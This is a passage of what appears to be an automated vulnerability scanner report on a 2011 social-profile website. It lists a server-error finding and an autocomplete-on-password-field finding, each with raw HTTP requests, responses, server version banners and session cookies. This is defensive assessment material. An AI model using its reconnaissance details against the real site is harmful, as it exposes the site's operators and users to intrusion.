value="agree" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /profiles/

/profiles/

http://www.socialfollow.com/profiles/

Request

GET /profiles/ HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Profile Listing | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><link type="text/css" rel="stylesheet" href="/css/profile-listing.css" /><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button class='selected'">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="profile"> <h1>New <span class="orange">Profiles</span></h1> <div class="left" style="padding-top: 0;"> <div class="grad-box"><div class="grad-inner"> <br /> <table cellpadding="0" cellspacing="0" width="100%" class="listing"> <tr> <td width="49%" valign="top" height="150" style="padding-top: 0;"> <a href="/profiles/steffas-and-associates/" title="Steffas And Associates" class="pic"><span style="height:108px;"><img src="/images/profiles/steffas-and-associates-f217905b3c87b4e7c2d0da3b9035ee87.jpg" alt="Steffas And Associates" width="80" /></span></a> <p class="name"><a href="/profiles/steffas-and-associates/" title="Steffas And Associates" class="green name">Steffas And Associates</a></p> <p class="desc orange"> Steffas & Associates, P.C. is an AV Rated boutique law firm, which limits [...]</p> <p class="fullProfile"><a href="/profiles/steffas-and-associates/" title="Steffas And Associates">View Full <span class="green">Profile &gt;</span></a></p> </td> <td width="49%" valign="top" height="150" style="padding-top: 0;"> <a href="/profiles/all-tech-investigations/" title="All Tech Investigations" class="pic"><span style="height:105px;"><img src="/images/profiles/all-tech-investigations-5dc6f9239c60bfc31d7a8bbbda3aac47.jpg" alt="All Tech Investigations" width="80" /></span></a> <p class="name"><a href="/profiles/all-tech-investigations/" title="All Tech Investigations" class="green name">All Tech Investigations</a></p> <p class="desc orange"> Texas Private Investigations<br />
Texas Process Server<br />
Texas [...]</p> <p class="fullProfile"><a href="/profiles/all-tech-investigations/" title="All Tech Investigations">View Full <span class="green">Profile &gt;</span></a></p> </td> </tr><tr> <td width="49%" valign="top" height="150" style="border-bottom: none;"> <a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt" class="pic"><span style="height:128px;"><img src="/images/profiles/gerhard-schwandt-99311c6b751ad596f53ca36e3f1503e4.jpg" alt="Gerhard Schwandt" width="80" /></span></a> <p class="name"><a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt" class="green name">Gerhard Schwandt</a></p> <p class="desc orange"> Our Mission Statement:<br />
<br />
A business world of stable and [...]</p> <p class="fullProfile"><a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt">View Full <span class="green">Profile &gt;</span></a></p> </td> <td width="49%" valign="top" height="150" style="border-bottom: none;"> <a href="/profiles/flyingpacket/" title="" class="pic"><span style="height:97px;"><img src="/images/profiles/flyingpacket-814a90483680dc132a346b2aec87b698.jpg" alt="" width="80" /></span></a> <p class="name"><a href="/profiles/flyingpacket/" title="" class="green name"></a></p> <p class="desc orange"> GANA PREMIOS EN EFECTIVO, MUCHA SUERTE [...]</p> <p class="fullProfile"><a href="/profiles/flyingpacket/" title="">View Full <span class="green">Profile &gt;</span></a></p> </td> </tr> </table> <div class="hr-green"></div> </div></div> <br /> </div> <div class="right"> <div class="banner"> <a href="/" title="Social Follow"><img src="/images/banner-social-follow.gif" alt="Signup for Social Follow" /></a> </div> <br /> <h4>Sponsor</h4> <div class="banner"> <p align="center"><a href="http://www.sendarticles.com/?ad=sa" title="SendArticles.com Article Submission Service" target="_blank"><img src="http://www.sendarticles.com/banners/banner.gif" alt="SendArticles.com Article Submission Service" /></a></p> </div> </div> <!-- End: Right Section --> <div id="navigateProfiles"> <h2>Navigate <span class="orange">Profiles</span></h2> <div class="grad-box"> <div id="list-top"> <ul> <li><a href="/profiles/?letter=A" title='View profiles starting with "A"' class="selected">A</a></li><li><a href="/profiles/?letter=B" title='View profiles starting with "B"'>B</a></li><li><a href="/profiles/?letter=C" title='View profiles starting with "C"'>C</a></li><li><a href="/profiles/?letter=D" title='View profiles starting with "D"'>D</a></li><li><a href="/profiles/?letter=E" title='View profiles starting with "E"'>E</a></li><li><a href="/profiles/?letter=F" title='View profiles starting with "F"'>F</a></li><li><a href="/profiles/?letter=G" title='View profiles starting with "G"'>G</a></li><li><a href="/profiles/?letter=H" title='View profiles starting with "H"'>H</a></li><li><a href="/profiles/?letter=I" title='View profiles starting with "I"'>I</a></li><li><a href="/profiles/?letter=J" title='View profiles starting with "J"'>J</a></li><li><a href="/profiles/?letter=K" title='View profiles starting with "K"'>K</a></li><li><a href="/profiles/?letter=L" title='View profiles starting with "L"'>L</a></li><li><a href="/profiles/?letter=M" title='View profiles starting with "M"'>M</a></li><li><a href="/profiles/?letter=N" title='View profiles starting with "N"'>N</a></li><li><a href="/profiles/?letter=O" title='View profiles starting with "O"'>O</a></li><li><a href="/profiles/?letter=P" title='View profiles starting with "P"'>P</a></li><li><a href="/profiles/?letter=Q" title='View profiles starting with "Q"'>Q</a></li><li><a href="/profiles/?letter=R" title='View profiles starting with "R"'>R</a></li><li><a href="/profiles/?letter=S" title='View profiles starting with "S"'>S</a></li><li><a href="/profiles/?letter=T" title='View profiles starting with "T"'>T</a></li><li><a href="/profiles/?letter=U" title='View profiles starting with "U"'>U</a></li><li><a href="/profiles/?letter=V" title='View profiles starting with "V"'>V</a></li><li><a href="/profiles/?letter=W" title='View profiles starting with "W"'>W</a></li><li><a href="/profiles/?letter=X" title='View profiles starting with "X"'>X</a></li><li><a href="/profiles/?letter=Y" title='View profiles starting with "Y"'>Y</a></li><li><a href="/profiles/?letter=Z" title='View profiles starting with "Z"'>Z</a></li> </ul> <img src="/images/profile_list-divider.gif" alt="" width="2" height="30" style="float: left;" /> <div id="listSearch"> <form action="" method="get" name="fSearch"> <input type="text" name="search" maxlength="100" style="width: 160px;" /> <input type="submit" value="Search" style="color: #FFFFFF; background-color: transparent; font-size: 12px; font-weight:bold;" onmouseover="this.style.cursor='pointer';" /> </form> </div> </div> <div id="list-body"> <div class="profile"> <a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="pic"><span style="height:49px;"><img src="/images/profiles/a-and-s-fine-foods-wyckoff-7beab34bf598bd1b6442ddf2b99ee169.png" alt="A And S Fine Foods Wyckoff" width="80" /></span></a> <a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="pic"><span style="height:49px;"><img src="/images/profiles/a-and-s-fine-foods-wyckoff-7beab34bf598bd1b6442ddf2b99ee169.png" alt="A And S Fine Foods Wyckoff" width="80" /></span></a> <p class="name"><a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="green">A And S Fine Foods Wyckoff</a></p> <p class="desc orange"> Every day we work hard to bring you the very best in Italian specialties, personally prepared foods with the freshest and finest ingredients, and [...]</p> <p class="fullProfile"><a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="pic"><span style="height:115px;"><img src="/images/profiles/a-child-by-mercy-58445fdc182a33719f133fca101c155d.jpg" alt="A Child By Mercy" width="80" /></span></a> <a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="pic"><span style="height:115px;"><img src="/images/profiles/a-child-by-mercy-58445fdc182a33719f133fca101c155d.jpg" alt="A Child By Mercy" width="80" /></span></a> <p class="name"><a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="green">A Child By Mercy</a></p> <p class="desc orange"> Author, Speaker, Urban Missionary, and Musicain [...]</p> <p class="fullProfile"><a href="/profiles/a-child-by-mercy/" title="A Child By Mercy">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="pic"><span style="height:60px;"><img src="/images/profiles/a-comer-sabroso-863aa08898eef8778f827a5054a1bd7f.jpg" alt="A Comer Sabroso" width="80" /></span></a> <a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="pic"><span style="height:60px;"><img src="/images/profiles/a-comer-sabroso-863aa08898eef8778f827a5054a1bd7f.jpg" alt="A Comer Sabroso" width="80" /></span></a> <p class="name"><a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="green">A Comer Sabroso</a></p> <p class="desc orange"> RECETAS DE COMIDAS, POSTRES Y LICORES [...]</p> <p class="fullProfile"><a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="pic"><span style="height:80px;"><img src="/images/profiles/mystery-man.jpg" alt="A Little Bite Of Life" width="80" /></span></a> <a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="pic"><span style="height:80px;"><img src="/images/profiles/mystery-man.jpg" alt="A Little Bite Of Life" width="80" /></span></a> <p class="name"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="green">A Little Bite Of Life</a></p> <p class="desc orange"> Food, family, funny! [...]</p> <p class="fullProfile"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <p class="name"><a href="/profiles/a-special-touch/" title="A Special Touch" class="green">A Special Touch</a></p> <p class="desc orange"> Handmade Greeting cards for any occasion. [...]</p> <p class="fullProfile"><a href="/profiles/a-special-touch/" title="A Special Touch">View Full <span class="green"..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /blog/wp-comments-post.php

/blog/wp-comments-post.php CONFIRMED

http://www.socialfollow.com/blog/wp-comments-post.php

Request

POST /blog/wp-comments-post.php HTTP/1.1
Referer: http://www.socialfollow.com/blog/featured/social-follow-creator-interviewed/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Content-Length: 407
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

author=&comment=&comment_parent=0&comment_post_ID=79&email=&sk2_ip=173.193.214.243&sk2_my_js_check1=qvp772d5fo&sk2_my_js_check2=d678ce52479624c84bb8b9dc32fdd330&sk2_my_js_payload=)%3b%0a%09document.write(Math.round+(+Math.abs((Math.max((((((1+%2b+14)+*+20)+*+41)+-+29)+-+33)%2c+7)+%2b+21))))%3b%0a%09document.write(&sk2_payload=4cd66f8dfcdb0536716f21501ca5b645&sk2_time=1303262201&submit=Submit+Comment&url=

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 20 Apr 2011 02:08:43 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 20 Apr 2011 02:08:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 1200
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono --><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>WordPress &rsaquo; Error</title> <link rel="stylesheet" href="http://www.socialfollow.com/blog/wp-admin/css/install.css" type="text/css" /></head><body id="error-page"> <p>Error: please fill the required fields (name, email).</p></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /sitemap.php

/sitemap.php CONFIRMED

http://www.socialfollow.com/sitemap.php

Identified Field Name

pPassword

Request

GET /sitemap.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Sitemap | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><style type="text/css">div.left ul { margin-left: 15px; list-style-type: disc; } div.left ul li { padding-bottom: 5px; }</style><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1 class="title">Sitemap</h1> <ul class="sitemaptext"><li><a href="/" title="Home">Home</a></li><li><a href="/blog/" title="Blog">Blog</a></li><li><a href="/profiles/" title="Profiles">Profiles</a></li><li><a href="/login.php" title="Login">Login</a></li><li><a href="/contact-us.php" title="Contact Us">Contact Us</a></li><li><a href="/sitemap.php" title="Sitemap">Sitemap</a></li><li>Blog</li><li style="list-style-type: none;"><ul><li>2009</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/03/" title="03">03</a></li><li><a href="/blog/2009/04/" title="04">04</a></li><li><a href="/blog/2009/06/" title="06">06</a></li><li>06</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/06/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/07/" title="07">07</a></li><li>07</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/07/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/08/" title="08">08</a></li></ul></li><li>Categories</li><li style="list-style-type: none;"><ul><li><a href="/blog/c/featured/" title="Featured">Featured</a></li><li><a href="/blog/c/future-features/" title="Future-features">Future-features</a></li><li><a href="/blog/c/new-releases/" title="New-releases">New-releases</a></li><li><a href="/blog/c/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/c/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li></ul></li><li>Featured</li><li style="list-style-type: none;"><ul><li><a href="/blog/featured/social-follow-creator-interviewed/" title="Social-follow-creator-interviewed">Social-follow-creator-interviewed</a></li><li><a href="/blog/featured/social-follow-featured-on-blogger-institute/" title="Social-follow-featured-on-blogger-institute">Social-follow-featured-on-blogger-institute</a></li><li><a href="/blog/featured/social-follow-featured-on-fine-art-of-blogging/" title="Social-follow-featured-on-fine-art-of-blogging">Social-follow-featured-on-fine-art-of-blogging</a></li><li><a href="/blog/featured/social-follow-featured-on-go2web20net/" title="Social-follow-featured-on-go2web20net">Social-follow-featured-on-go2web20net</a></li><li><a href="/blog/featured/social-follow-featured-on-killerstartups/" title="Social-follow-featured-on-killerstartups">Social-follow-featured-on-killerstartups</a></li><li><a href="/blog/featured/social-follow-featured-on-ziipa-vote-for-us/" title="Social-follow-featured-on-ziipa-vote-for-us">Social-follow-featured-on-ziipa-vote-for-us</a></li><li><a href="/blog/featured/visionwiz-blogs-about-socialfollowcom/" title="Visionwiz-blogs-about-socialfollowcom">Visionwiz-blogs-about-socialfollowcom</a></li><li><a href="/blog/featured/vote-for-social-follow-on-listio-com/" title="Vote-for-social-follow-on-listio-com">Vote-for-social-follow-on-listio-com</a></li></ul></li><li>Future Features</li><li style="list-style-type: none;"><ul><li><a href="/blog/future-features/social-follow-profile-pages-coming-soon/" title="Social-follow-profile-pages-coming-soon">Social-follow-profile-pages-coming-soon</a></li></ul></li><li>New Releases</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/server-upgrade-for-social-follow/" title="Server-upgrade-for-social-follow">Server-upgrade-for-social-follow</a></li><li><a href="/blog/new-releases/social-follow-almost-launched/" title="Social-follow-almost-launched">Social-follow-almost-launched</a></li><li><a href="/blog/new-releases/social-follow-button-user-flow/" title="Social-follow-button-user-flow">Social-follow-button-user-flow</a></li><li><a href="/blog/new-releases/social-follow-expanded/" title="Social-follow-expanded">Social-follow-expanded</a></li><li><a href="/blog/new-releases/social-follow-expands-internationally/" title="Social-follow-expands-internationally">Social-follow-expands-internationally</a></li><li><a href="/blog/new-releases/social-follow-launches/" title="Social-follow-launches">Social-follow-launches</a></li><li><a href="/blog/new-releases/social-follow-profiles-officially-launched/" title="Social-follow-profiles-officially-launched">Social-follow-profiles-officially-launched</a></li><li><a href="/blog/new-releases/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/" title="Wordpress-plugin-for-social-follow">Wordpress-plugin-for-social-follow</a></li><li>Wordpress Plugin For Social Follow</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/comment-page-1/" title="Comment-page-1">Comment-page-1</a></li></ul></li></ul></li><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/page/2/" title="2">2</a></li><li><a href="/blog/page/3/" title="3">3</a></li></ul></li><li>Social Following</li><li style="list-style-type: none;"><ul><li><a href="/blog/social-following/definition-of-social-follow/" title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/social-following/social-follow-joins-twitter/" title="Social-follow-joins-twitter">Social-follow-joins-twitter</a></li></ul></li><li>Tag</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/analytics/" title="Analytics">Analytics</a></li><li><a href="/blog/tag/blogger-institute/" title="Blogger-institute">Blogger-institute</a></li><li><a href="/blog/tag/definition-of-social-follow/" title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/tag/featured/" title="Featured">Featured</a></li><li><a href="/blog/tag/fine-art-of-blogging/" title="Fine-art-of-blogging">Fine-art-of-blogging</a></li><li><a href="/blog/tag/follow-me-button/" title="Follow-me-button">Follow-me-button</a></li><li><a href="/blog/tag/go2web20net/" title="Go2web20net">Go2web20net</a></li><li><a href="/blog/tag/interview/" title="Interview">Interview</a></li><li><a href="/blog/tag/kerry-jones/" title="Kerry-jones">Kerry-jones</a></li><li><a href="/blog/tag/killerstartupscom/" title="Killerstartupscom">Killerstartupscom</a></li><li><a href="/blog/tag/multiple-languages/" title="Multiple-languages">Multiple-languages</a></li><li><a href="/blog/tag/new-feature/" title="New-feature">New-feature</a></li><li><a href="/blog/tag/new-release/" title="New-release">New-release</a></li><li><a href="/blog/tag/plugin/" title="Plugin">Plugin</a></li><li><a href="/blog/tag/rafferty-pendery/" title="Rafferty-pendery">Rafferty-pendery</a></li><li><a href="/blog/tag/raffy-pendery/" title="Raffy-pendery">Raffy-pendery</a></li><li><a href="/blog/tag/reputation-management/" title="Reputation-management">Reputation-management</a></li><li><a href="/blog/tag/social-follow-button/" title="Social-follow-button">Social-follow-button</a></li><li><a href="/blog/tag/social-follow-featured/" title="Social-follow-featured">Social-follow-featured</a></li><li><a href="/blog/tag/social-follow-new-releases/" title="Social-follow-new-releases">Social-follow-new-releases</a></li><li><a href="/blog/tag/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/tag/social-follow-user-flow/" title="Social-follow-user-flow">Social-follow-user-flow</a></li><li><a href="/blog/tag/social-follow/" title="Social-follow">Social-follow</a></li><li>Social Follow</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/social-follow/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/tag/social-networking-profiles/" title="Social-networking-profiles">Social-networking-profiles</a></li><li><a href="/blog/tag/social-networks/" title="Social-networks">Social-networks</a></li><li><a href="/blog/tag/social-profiles/" title="Social-profiles">Social-profiles</a></li><li><a href="/blog/tag/studio98/" title="Studio98">Studio98</a></li><li><a href="/blog/tag/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/twitter-feed/" title="Twitter-feed">Twitter-feed</a></li><li><a href="/blog/tag/twitter/" title="Twitter">Twitter</a></li><li>Twitter</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/twitter/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/visionwiz/" title="Visionwiz">Visionwiz</a></li><li><a href="/blog/tag/vote-for-social-follow/" title="Vote-for-social-follow">Vote-for-social-follow</a></li><li><a href="/blog/tag/vote-for-us/" 